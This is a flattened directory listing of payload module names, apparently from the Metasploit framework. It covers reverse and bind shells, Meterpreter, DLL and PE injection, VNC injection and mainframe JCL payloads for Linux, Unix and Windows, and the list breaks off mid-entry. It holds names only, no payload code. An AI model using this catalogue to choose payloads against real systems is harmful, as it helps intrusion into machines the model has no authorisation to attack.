payload/cmd/linux/http/x86/shell/reverse_nonx_tcp | payload/cmd/linux/http/x86/shell/reverse_tcp | payload/cmd/linux/http/x86/shell/reverse_tcp_uuid | . | payload/cmd/linux/http/x86/adduser | payload/cmd/linux/http/x86/chmod | payload/cmd/linux/http/x86/exec | payload/cmd/linux/http/x86/meterpreter_reverse_http | payload/cmd/linux/http/x86/meterpreter_reverse_https | payload/cmd/linux/http/x86/meterpreter_reverse_tcp | payload/cmd/linux/http/x86/metsvc_bind_tcp | payload/cmd/linux/http/x86/metsvc_reverse_tcp | payload/cmd/linux/http/x86/read_file | payload/cmd/linux/http/x86/shell_bind_ipv6_tcp | payload/cmd/linux/http/x86/shell_bind_tcp | payload/cmd/linux/http/x86/shell_bind_tcp_random_port | payload/cmd/linux/http/x86/shell_find_port | payload/cmd/linux/http/x86/shell_find_tag | payload/cmd/linux/http/x86/shell_reverse_tcp | payload/cmd/linux/http/x86/shell_reverse_tcp_ipv6 | . | . | https (59) . | mips64 (3) . | payload/cmd/linux/https/mips64/meterpreter_reverse_http | payload/cmd/linux/https/mips64/meterpreter_reverse_https | payload/cmd/linux/https/mips64/meterpreter_reverse_tcp | . | x64 (18) . | meterpreter (3) . | payload/cmd/linux/https/x64/meterpreter/bind_tcp | payload/cmd/linux/https/x64/meterpreter/reverse_sctp | payload/cmd/linux/https/x64/meterpreter/reverse_tcp | . | shell (3) . | payload/cmd/linux/https/x64/shell/bind_tcp | payload/cmd/linux/https/x64/shell/reverse_sctp | payload/cmd/linux/https/x64/shell/reverse_tcp | . | payload/cmd/linux/https/x64/exec | payload/cmd/linux/https/x64/meterpreter_reverse_http | payload/cmd/linux/https/x64/meterpreter_reverse_https | payload/cmd/linux/https/x64/meterpreter_reverse_tcp | payload/cmd/linux/https/x64/pingback_bind_tcp | payload/cmd/linux/https/x64/pingback_reverse_tcp | payload/cmd/linux/https/x64/shell_bind_ipv6_tcp | payload/cmd/linux/https/x64/shell_bind_tcp | payload/cmd/linux/https/x64/shell_bind_tcp_random_port | payload/cmd/linux/https/x64/shell_find_port | payload/cmd/linux/https/x64/shell_reverse_ipv6_tcp | payload/cmd/linux/https/x64/shell_reverse_tcp | . | x86 (38) . | generic (2) . | payload/cmd/linux/https/x86/generic/debug_trap | payload/cmd/linux/https/x86/generic/tight_loop | . | meterpreter (10) . | payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp | payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/linux/https/x86/meterpreter/bind_nonx_tcp | payload/cmd/linux/https/x86/meterpreter/bind_tcp | payload/cmd/linux/https/x86/meterpreter/bind_tcp_uuid | payload/cmd/linux/https/x86/meterpreter/find_tag | payload/cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp | payload/cmd/linux/https/x86/meterpreter/reverse_nonx_tcp | payload/cmd/linux/https/x86/meterpreter/reverse_tcp | payload/cmd/linux/https/x86/meterpreter/reverse_tcp_uuid | . | shell (10) . | payload/cmd/linux/https/x86/shell/bind_ipv6_tcp | payload/cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid | payload/cmd/linux/https/x86/shell/bind_nonx_tcp | payload/cmd/linux/https/x86/shell/bind_tcp | payload/cmd/linux/https/x86/shell/bind_tcp_uuid | payload/cmd/linux/https/x86/shell/find_tag | payload/cmd/linux/https/x86/shell/reverse_ipv6_tcp | payload/cmd/linux/https/x86/shell/reverse_nonx_tcp | payload/cmd/linux/https/x86/shell/reverse_tcp | payload/cmd/linux/https/x86/shell/reverse_tcp_uuid | . | payload/cmd/linux/https/x86/adduser | payload/cmd/linux/https/x86/chmod | payload/cmd/linux/https/x86/exec | payload/cmd/linux/https/x86/meterpreter_reverse_http | payload/cmd/linux/https/x86/meterpreter_reverse_https | payload/cmd/linux/https/x86/meterpreter_reverse_tcp | payload/cmd/linux/https/x86/metsvc_bind_tcp | payload/cmd/linux/https/x86/metsvc_reverse_tcp | payload/cmd/linux/https/x86/read_file | payload/cmd/linux/https/x86/shell_bind_ipv6_tcp | payload/cmd/linux/https/x86/shell_bind_tcp | payload/cmd/linux/https/x86/shell_bind_tcp_random_port | payload/cmd/linux/https/x86/shell_find_port | payload/cmd/linux/https/x86/shell_find_tag | payload/cmd/linux/https/x86/shell_reverse_tcp | payload/cmd/linux/https/x86/shell_reverse_tcp_ipv6 | . | . | tftp (59) . | mips64 (3) . | payload/cmd/linux/tftp/mips64/meterpreter_reverse_http | payload/cmd/linux/tftp/mips64/meterpreter_reverse_https | payload/cmd/linux/tftp/mips64/meterpreter_reverse_tcp | . | x64 (18) . | meterpreter (3) . | payload/cmd/linux/tftp/x64/meterpreter/bind_tcp | payload/cmd/linux/tftp/x64/meterpreter/reverse_sctp | payload/cmd/linux/tftp/x64/meterpreter/reverse_tcp | . | shell (3) . | payload/cmd/linux/tftp/x64/shell/bind_tcp | payload/cmd/linux/tftp/x64/shell/reverse_sctp | payload/cmd/linux/tftp/x64/shell/reverse_tcp | . | payload/cmd/linux/tftp/x64/exec | payload/cmd/linux/tftp/x64/meterpreter_reverse_http | payload/cmd/linux/tftp/x64/meterpreter_reverse_https | payload/cmd/linux/tftp/x64/meterpreter_reverse_tcp | payload/cmd/linux/tftp/x64/pingback_bind_tcp | payload/cmd/linux/tftp/x64/pingback_reverse_tcp | payload/cmd/linux/tftp/x64/shell_bind_ipv6_tcp | payload/cmd/linux/tftp/x64/shell_bind_tcp | payload/cmd/linux/tftp/x64/shell_bind_tcp_random_port | payload/cmd/linux/tftp/x64/shell_find_port | payload/cmd/linux/tftp/x64/shell_reverse_ipv6_tcp | payload/cmd/linux/tftp/x64/shell_reverse_tcp | . | x86 (38) . | generic (2) . | payload/cmd/linux/tftp/x86/generic/debug_trap | payload/cmd/linux/tftp/x86/generic/tight_loop | . | meterpreter (10) . | payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp | payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp | payload/cmd/linux/tftp/x86/meterpreter/bind_tcp | payload/cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid | payload/cmd/linux/tftp/x86/meterpreter/find_tag | payload/cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp | payload/cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp | payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp | payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid | . | shell (10) . | payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp | payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid | payload/cmd/linux/tftp/x86/shell/bind_nonx_tcp | payload/cmd/linux/tftp/x86/shell/bind_tcp | payload/cmd/linux/tftp/x86/shell/bind_tcp_uuid | payload/cmd/linux/tftp/x86/shell/find_tag | payload/cmd/linux/tftp/x86/shell/reverse_ipv6_tcp | payload/cmd/linux/tftp/x86/shell/reverse_nonx_tcp | payload/cmd/linux/tftp/x86/shell/reverse_tcp | payload/cmd/linux/tftp/x86/shell/reverse_tcp_uuid | . | payload/cmd/linux/tftp/x86/adduser | payload/cmd/linux/tftp/x86/chmod | payload/cmd/linux/tftp/x86/exec | payload/cmd/linux/tftp/x86/meterpreter_reverse_http | payload/cmd/linux/tftp/x86/meterpreter_reverse_https | payload/cmd/linux/tftp/x86/meterpreter_reverse_tcp | payload/cmd/linux/tftp/x86/metsvc_bind_tcp | payload/cmd/linux/tftp/x86/metsvc_reverse_tcp | payload/cmd/linux/tftp/x86/read_file | payload/cmd/linux/tftp/x86/shell_bind_ipv6_tcp | payload/cmd/linux/tftp/x86/shell_bind_tcp | payload/cmd/linux/tftp/x86/shell_bind_tcp_random_port | payload/cmd/linux/tftp/x86/shell_find_port | payload/cmd/linux/tftp/x86/shell_find_tag | payload/cmd/linux/tftp/x86/shell_reverse_tcp | payload/cmd/linux/tftp/x86/shell_reverse_tcp_ipv6 | . | . | . | mainframe (4) . | payload/cmd/mainframe/apf_privesc_jcl | payload/cmd/mainframe/bind_shell_jcl | payload/cmd/mainframe/generic_jcl | payload/cmd/mainframe/reverse_shell_jcl | . | unix (71) . | python (18) . | meterpreter (7) . | payload/cmd/unix/python/meterpreter/bind_tcp | payload/cmd/unix/python/meterpreter/bind_tcp_uuid | payload/cmd/unix/python/meterpreter/reverse_http | payload/cmd/unix/python/meterpreter/reverse_https | payload/cmd/unix/python/meterpreter/reverse_tcp | payload/cmd/unix/python/meterpreter/reverse_tcp_ssl | payload/cmd/unix/python/meterpreter/reverse_tcp_uuid | . | payload/cmd/unix/python/meterpreter_bind_tcp | payload/cmd/unix/python/meterpreter_reverse_http | payload/cmd/unix/python/meterpreter_reverse_https | payload/cmd/unix/python/meterpreter_reverse_tcp | payload/cmd/unix/python/pingback_bind_tcp | payload/cmd/unix/python/pingback_reverse_tcp | payload/cmd/unix/python/shell_bind_tcp | payload/cmd/unix/python/shell_reverse_sctp | payload/cmd/unix/python/shell_reverse_tcp | payload/cmd/unix/python/shell_reverse_tcp_ssl | payload/cmd/unix/python/shell_reverse_udp | . | payload/cmd/unix/adduser | payload/cmd/unix/bind_awk | payload/cmd/unix/bind_aws_instance_connect | payload/cmd/unix/bind_busybox_telnetd | payload/cmd/unix/bind_inetd | payload/cmd/unix/bind_jjs | payload/cmd/unix/bind_lua | payload/cmd/unix/bind_netcat | payload/cmd/unix/bind_netcat_gaping | payload/cmd/unix/bind_netcat_gaping_ipv6 | payload/cmd/unix/bind_nodejs | payload/cmd/unix/bind_perl | payload/cmd/unix/bind_perl_ipv6 | payload/cmd/unix/bind_r | payload/cmd/unix/bind_ruby | payload/cmd/unix/bind_ruby_ipv6 | payload/cmd/unix/bind_socat_sctp | payload/cmd/unix/bind_socat_udp | payload/cmd/unix/bind_stub | payload/cmd/unix/bind_zsh | payload/cmd/unix/generic | payload/cmd/unix/interact | payload/cmd/unix/pingback_bind | payload/cmd/unix/pingback_reverse | payload/cmd/unix/reverse | payload/cmd/unix/reverse_awk | payload/cmd/unix/reverse_bash | payload/cmd/unix/reverse_bash_telnet_ssl | payload/cmd/unix/reverse_bash_udp | payload/cmd/unix/reverse_jjs | payload/cmd/unix/reverse_ksh | payload/cmd/unix/reverse_lua | payload/cmd/unix/reverse_ncat_ssl | payload/cmd/unix/reverse_netcat | payload/cmd/unix/reverse_netcat_gaping | payload/cmd/unix/reverse_nodejs | payload/cmd/unix/reverse_openssl | payload/cmd/unix/reverse_perl | payload/cmd/unix/reverse_perl_ssl | payload/cmd/unix/reverse_php_ssl | payload/cmd/unix/reverse_python | payload/cmd/unix/reverse_python_ssl | payload/cmd/unix/reverse_r | payload/cmd/unix/reverse_ruby | payload/cmd/unix/reverse_ruby_ssl | payload/cmd/unix/reverse_socat_sctp | payload/cmd/unix/reverse_socat_tcp | payload/cmd/unix/reverse_socat_udp | payload/cmd/unix/reverse_ssh | payload/cmd/unix/reverse_ssl_double_telnet | payload/cmd/unix/reverse_stub | payload/cmd/unix/reverse_tclsh | payload/cmd/unix/reverse_zsh | . | windows (632) . | http (77) . | x64 (77) . | custom (14) . | payload/cmd/windows/http/x64/custom/bind_ipv6_tcp | payload/cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid | payload/cmd/windows/http/x64/custom/bind_named_pipe | payload/cmd/windows/http/x64/custom/bind_tcp | payload/cmd/windows/http/x64/custom/bind_tcp_rc4 | payload/cmd/windows/http/x64/custom/bind_tcp_uuid | payload/cmd/windows/http/x64/custom/reverse_http | payload/cmd/windows/http/x64/custom/reverse_https | payload/cmd/windows/http/x64/custom/reverse_named_pipe | payload/cmd/windows/http/x64/custom/reverse_tcp | payload/cmd/windows/http/x64/custom/reverse_tcp_rc4 | payload/cmd/windows/http/x64/custom/reverse_tcp_uuid | payload/cmd/windows/http/x64/custom/reverse_winhttp | payload/cmd/windows/http/x64/custom/reverse_winhttps | . | encrypted_shell (1) . | payload/cmd/windows/http/x64/encrypted_shell/reverse_tcp | . | meterpreter (14) . | payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp | payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/http/x64/meterpreter/bind_named_pipe | payload/cmd/windows/http/x64/meterpreter/bind_tcp | payload/cmd/windows/http/x64/meterpreter/bind_tcp_rc4 | payload/cmd/windows/http/x64/meterpreter/bind_tcp_uuid | payload/cmd/windows/http/x64/meterpreter/reverse_http | payload/cmd/windows/http/x64/meterpreter/reverse_https | payload/cmd/windows/http/x64/meterpreter/reverse_named_pipe | payload/cmd/windows/http/x64/meterpreter/reverse_tcp | payload/cmd/windows/http/x64/meterpreter/reverse_tcp_rc4 | payload/cmd/windows/http/x64/meterpreter/reverse_tcp_uuid | payload/cmd/windows/http/x64/meterpreter/reverse_winhttp | payload/cmd/windows/http/x64/meterpreter/reverse_winhttps | . | peinject (10) . | payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp | payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid | payload/cmd/windows/http/x64/peinject/bind_named_pipe | payload/cmd/windows/http/x64/peinject/bind_tcp | payload/cmd/windows/http/x64/peinject/bind_tcp_rc4 | payload/cmd/windows/http/x64/peinject/bind_tcp_uuid | payload/cmd/windows/http/x64/peinject/reverse_named_pipe | payload/cmd/windows/http/x64/peinject/reverse_tcp | payload/cmd/windows/http/x64/peinject/reverse_tcp_rc4 | payload/cmd/windows/http/x64/peinject/reverse_tcp_uuid | . | shell (9) . | payload/cmd/windows/http/x64/shell/bind_ipv6_tcp | payload/cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid | payload/cmd/windows/http/x64/shell/bind_named_pipe | payload/cmd/windows/http/x64/shell/bind_tcp | payload/cmd/windows/http/x64/shell/bind_tcp_rc4 | payload/cmd/windows/http/x64/shell/bind_tcp_uuid | payload/cmd/windows/http/x64/shell/reverse_tcp | payload/cmd/windows/http/x64/shell/reverse_tcp_rc4 | payload/cmd/windows/http/x64/shell/reverse_tcp_uuid | . | vncinject (13) . | payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp | payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid | payload/cmd/windows/http/x64/vncinject/bind_named_pipe | payload/cmd/windows/http/x64/vncinject/bind_tcp | payload/cmd/windows/http/x64/vncinject/bind_tcp_rc4 | payload/cmd/windows/http/x64/vncinject/bind_tcp_uuid | payload/cmd/windows/http/x64/vncinject/reverse_http | payload/cmd/windows/http/x64/vncinject/reverse_https | payload/cmd/windows/http/x64/vncinject/reverse_tcp | payload/cmd/windows/http/x64/vncinject/reverse_tcp_rc4 | payload/cmd/windows/http/x64/vncinject/reverse_tcp_uuid | payload/cmd/windows/http/x64/vncinject/reverse_winhttp | payload/cmd/windows/http/x64/vncinject/reverse_winhttps | . | payload/cmd/windows/http/x64/encrypted_shell_reverse_tcp | payload/cmd/windows/http/x64/exec | payload/cmd/windows/http/x64/loadlibrary | payload/cmd/windows/http/x64/messagebox | payload/cmd/windows/http/x64/meterpreter_bind_named_pipe | payload/cmd/windows/http/x64/meterpreter_bind_tcp | payload/cmd/windows/http/x64/meterpreter_reverse_http | payload/cmd/windows/http/x64/meterpreter_reverse_https | payload/cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp | payload/cmd/windows/http/x64/meterpreter_reverse_tcp | payload/cmd/windows/http/x64/pingback_reverse_tcp | payload/cmd/windows/http/x64/powershell_bind_tcp | payload/cmd/windows/http/x64/powershell_reverse_tcp | payload/cmd/windows/http/x64/powershell_reverse_tcp_ssl | payload/cmd/windows/http/x64/shell_bind_tcp | payload/cmd/windows/http/x64/shell_reverse_tcp | . | . | https (77) . | x64 (77) . | custom (14) . | payload/cmd/windows/https/x64/custom/bind_ipv6_tcp | payload/cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid | payload/cmd/windows/https/x64/custom/bind_named_pipe | payload/cmd/windows/https/x64/custom/bind_tcp | payload/cmd/windows/https/x64/custom/bind_tcp_rc4 | payload/cmd/windows/https/x64/custom/bind_tcp_uuid | payload/cmd/windows/https/x64/custom/reverse_http | payload/cmd/windows/https/x64/custom/reverse_https | payload/cmd/windows/https/x64/custom/reverse_named_pipe | payload/cmd/windows/https/x64/custom/reverse_tcp | payload/cmd/windows/https/x64/custom/reverse_tcp_rc4 | payload/cmd/windows/https/x64/custom/reverse_tcp_uuid | payload/cmd/windows/https/x64/custom/reverse_winhttp | payload/cmd/windows/https/x64/custom/reverse_winhttps | . | encrypted_shell (1) . | payload/cmd/windows/https/x64/encrypted_shell/reverse_tcp | . | meterpreter (14) . | payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp | payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/https/x64/meterpreter/bind_named_pipe | payload/cmd/windows/https/x64/meterpreter/bind_tcp | payload/cmd/windows/https/x64/meterpreter/bind_tcp_rc4 | payload/cmd/windows/https/x64/meterpreter/bind_tcp_uuid | payload/cmd/windows/https/x64/meterpreter/reverse_http | payload/cmd/windows/https/x64/meterpreter/reverse_https | payload/cmd/windows/https/x64/meterpreter/reverse_named_pipe | payload/cmd/windows/https/x64/meterpreter/reverse_tcp | payload/cmd/windows/https/x64/meterpreter/reverse_tcp_rc4 | payload/cmd/windows/https/x64/meterpreter/reverse_tcp_uuid | payload/cmd/windows/https/x64/meterpreter/reverse_winhttp | payload/cmd/windows/https/x64/meterpreter/reverse_winhttps | . | peinject (10) . | payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp | payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid | payload/cmd/windows/https/x64/peinject/bind_named_pipe | payload/cmd/windows/https/x64/peinject/bind_tcp | payload/cmd/windows/https/x64/peinject/bind_tcp_rc4 | payload/cmd/windows/https/x64/peinject/bind_tcp_uuid | payload/cmd/windows/https/x64/peinject/reverse_named_pipe | payload/cmd/windows/https/x64/peinject/reverse_tcp | payload/cmd/windows/https/x64/peinject/reverse_tcp_rc4 | payload/cmd/windows/https/x64/peinject/reverse_tcp_uuid | . | shell (9) . | payload/cmd/windows/https/x64/shell/bind_ipv6_tcp | payload/cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid | payload/cmd/windows/https/x64/shell/bind_named_pipe | payload/cmd/windows/https/x64/shell/bind_tcp | payload/cmd/windows/https/x64/shell/bind_tcp_rc4 | payload/cmd/windows/https/x64/shell/bind_tcp_uuid | payload/cmd/windows/https/x64/shell/reverse_tcp | payload/cmd/windows/https/x64/shell/reverse_tcp_rc4 | payload/cmd/windows/https/x64/shell/reverse_tcp_uuid | . | vncinject (13) . | payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp | payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid | payload/cmd/windows/https/x64/vncinject/bind_named_pipe | payload/cmd/windows/https/x64/vncinject/bind_tcp | payload/cmd/windows/https/x64/vncinject/bind_tcp_rc4 | payload/cmd/windows/https/x64/vncinject/bind_tcp_uuid | payload/cmd/windows/https/x64/vncinject/reverse_http | payload/cmd/windows/https/x64/vncinject/reverse_https | payload/cmd/windows/https/x64/vncinject/reverse_tcp | payload/cmd/windows/https/x64/vncinject/reverse_tcp_rc4 | payload/cmd/windows/https/x64/vncinject/reverse_tcp_uuid | payload/cmd/windows/https/x64/vncinject/reverse_winhttp | payload/cmd/windows/https/x64/vncinject/reverse_winhttps | . | payload/cmd/windows/https/x64/encrypted_shell_reverse_tcp | payload/cmd/windows/https/x64/exec | payload/cmd/windows/https/x64/loadlibrary | payload/cmd/windows/https/x64/messagebox | payload/cmd/windows/https/x64/meterpreter_bind_named_pipe | payload/cmd/windows/https/x64/meterpreter_bind_tcp | payload/cmd/windows/https/x64/meterpreter_reverse_http | payload/cmd/windows/https/x64/meterpreter_reverse_https | payload/cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp | payload/cmd/windows/https/x64/meterpreter_reverse_tcp | payload/cmd/windows/https/x64/pingback_reverse_tcp | payload/cmd/windows/https/x64/powershell_bind_tcp | payload/cmd/windows/https/x64/powershell_reverse_tcp | payload/cmd/windows/https/x64/powershell_reverse_tcp_ssl | payload/cmd/windows/https/x64/shell_bind_tcp | payload/cmd/windows/https/x64/shell_reverse_tcp | . | . | powershell (290) . | custom (28) . | payload/cmd/windows/powershell/custom/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/custom/bind_hidden_tcp | payload/cmd/windows/powershell/custom/bind_ipv6_tcp | payload/cmd/windows/powershell/custom/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/custom/bind_named_pipe | payload/cmd/windows/powershell/custom/bind_nonx_tcp | payload/cmd/windows/powershell/custom/bind_tcp | payload/cmd/windows/powershell/custom/bind_tcp_rc4 | payload/cmd/windows/powershell/custom/bind_tcp_uuid | payload/cmd/windows/powershell/custom/find_tag | payload/cmd/windows/powershell/custom/reverse_hop_http | payload/cmd/windows/powershell/custom/reverse_http | payload/cmd/windows/powershell/custom/reverse_http_proxy_pstore | payload/cmd/windows/powershell/custom/reverse_https | payload/cmd/windows/powershell/custom/reverse_https_proxy | payload/cmd/windows/powershell/custom/reverse_ipv6_tcp | payload/cmd/windows/powershell/custom/reverse_named_pipe | payload/cmd/windows/powershell/custom/reverse_nonx_tcp | payload/cmd/windows/powershell/custom/reverse_ord_tcp | payload/cmd/windows/powershell/custom/reverse_tcp | payload/cmd/windows/powershell/custom/reverse_tcp_allports | payload/cmd/windows/powershell/custom/reverse_tcp_dns | payload/cmd/windows/powershell/custom/reverse_tcp_rc4 | payload/cmd/windows/powershell/custom/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/custom/reverse_tcp_uuid | payload/cmd/windows/powershell/custom/reverse_udp | payload/cmd/windows/powershell/custom/reverse_winhttp | payload/cmd/windows/powershell/custom/reverse_winhttps | . | dllinject (23) . | payload/cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/dllinject/bind_hidden_tcp | payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp | payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/dllinject/bind_named_pipe | payload/cmd/windows/powershell/dllinject/bind_nonx_tcp | payload/cmd/windows/powershell/dllinject/bind_tcp | payload/cmd/windows/powershell/dllinject/bind_tcp_rc4 | payload/cmd/windows/powershell/dllinject/bind_tcp_uuid | payload/cmd/windows/powershell/dllinject/find_tag | payload/cmd/windows/powershell/dllinject/reverse_hop_http | payload/cmd/windows/powershell/dllinject/reverse_http | payload/cmd/windows/powershell/dllinject/reverse_http_proxy_pstore | payload/cmd/windows/powershell/dllinject/reverse_ipv6_tcp | payload/cmd/windows/powershell/dllinject/reverse_nonx_tcp | payload/cmd/windows/powershell/dllinject/reverse_ord_tcp | payload/cmd/windows/powershell/dllinject/reverse_tcp | payload/cmd/windows/powershell/dllinject/reverse_tcp_allports | payload/cmd/windows/powershell/dllinject/reverse_tcp_dns | payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4 | payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/dllinject/reverse_tcp_uuid | payload/cmd/windows/powershell/dllinject/reverse_winhttp | . | generic (2) . | payload/cmd/windows/powershell/generic/debug_trap | payload/cmd/windows/powershell/generic/tight_loop | . | meterpreter (27) . | payload/cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/meterpreter/bind_hidden_tcp | payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp | payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/meterpreter/bind_named_pipe | payload/cmd/windows/powershell/meterpreter/bind_nonx_tcp | payload/cmd/windows/powershell/meterpreter/bind_tcp | payload/cmd/windows/powershell/meterpreter/bind_tcp_rc4 | payload/cmd/windows/powershell/meterpreter/bind_tcp_uuid | payload/cmd/windows/powershell/meterpreter/find_tag | payload/cmd/windows/powershell/meterpreter/reverse_hop_http | payload/cmd/windows/powershell/meterpreter/reverse_http | payload/cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore | payload/cmd/windows/powershell/meterpreter/reverse_https | payload/cmd/windows/powershell/meterpreter/reverse_https_proxy | payload/cmd/windows/powershell/meterpreter/reverse_ipv6_tcp | payload/cmd/windows/powershell/meterpreter/reverse_named_pipe | payload/cmd/windows/powershell/meterpreter/reverse_nonx_tcp | payload/cmd/windows/powershell/meterpreter/reverse_ord_tcp | payload/cmd/windows/powershell/meterpreter/reverse_tcp | payload/cmd/windows/powershell/meterpreter/reverse_tcp_allports | payload/cmd/windows/powershell/meterpreter/reverse_tcp_dns | payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4 | payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/meterpreter/reverse_tcp_uuid | payload/cmd/windows/powershell/meterpreter/reverse_winhttp | payload/cmd/windows/powershell/meterpreter/reverse_winhttps | . | patchupdllinject (19) . | payload/cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/patchupdllinject/bind_hidden_tcp | payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp | payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/patchupdllinject/bind_named_pipe | payload/cmd/windows/powershell/patchupdllinject/bind_nonx_tcp | payload/cmd/windows/powershell/patchupdllinject/bind_tcp | payload/cmd/windows/powershell/patchupdllinject/bind_tcp_rc4 | payload/cmd/windows/powershell/patchupdllinject/bind_tcp_uuid | payload/cmd/windows/powershell/patchupdllinject/find_tag | payload/cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp | payload/cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp | payload/cmd/windows/powershell/patchupdllinject/reverse_ord_tcp | payload/cmd/windows/powershell/patchupdllinject/reverse_tcp | payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_allports | payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_dns | payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4 | payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid | . | patchupmeterpreter (19) . | payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp | payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp | payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/patchupmeterpreter/bind_named_pipe | payload/cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp | payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp | payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4 | payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid | payload/cmd/windows/powershell/patchupmeterpreter/find_tag | payload/cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp | payload/cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp | payload/cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp | payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp | payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports | payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns | payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4 | payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid | . | peinject (20) . | payload/cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/peinject/bind_hidden_tcp | payload/cmd/windows/powershell/peinject/bind_ipv6_tcp | payload/cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/peinject/bind_named_pipe | payload/cmd/windows/powershell/peinject/bind_nonx_tcp | payload/cmd/windows/powershell/peinject/bind_tcp | payload/cmd/windows/powershell/peinject/bind_tcp_rc4 | payload/cmd/windows/powershell/peinject/bind_tcp_uuid | payload/cmd/windows/powershell/peinject/find_tag | payload/cmd/windows/powershell/peinject/reverse_ipv6_tcp | payload/cmd/windows/powershell/peinject/reverse_named_pipe | payload/cmd/windows/powershell/peinject/reverse_nonx_tcp | payload/cmd/windows/powershell/peinject/reverse_ord_tcp | payload/cmd/windows/powershell/peinject/reverse_tcp | payload/cmd/windows/powershell/peinject/reverse_tcp_allports | payload/cmd/windows/powershell/peinject/reverse_tcp_dns | payload/cmd/windows/powershell/peinject/reverse_tcp_rc4 | payload/cmd/windows/powershell/peinject/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/peinject/reverse_tcp_uuid | . | shell (20) . | payload/cmd/windows/powershell/shell/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/shell/bind_hidden_tcp | payload/cmd/windows/powershell/shell/bind_ipv6_tcp | payload/cmd/windows/powershell/shell/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/shell/bind_named_pipe | payload/cmd/windows/powershell/shell/bind_nonx_tcp | payload/cmd/windows/powershell/shell/bind_tcp | payload/cmd/windows/powershell/shell/bind_tcp_rc4 | payload/cmd/windows/powershell/shell/bind_tcp_uuid | payload/cmd/windows/powershell/shell/find_tag | payload/cmd/windows/powershell/shell/reverse_ipv6_tcp | payload/cmd/windows/powershell/shell/reverse_nonx_tcp | payload/cmd/windows/powershell/shell/reverse_ord_tcp | payload/cmd/windows/powershell/shell/reverse_tcp | payload/cmd/windows/powershell/shell/reverse_tcp_allports | 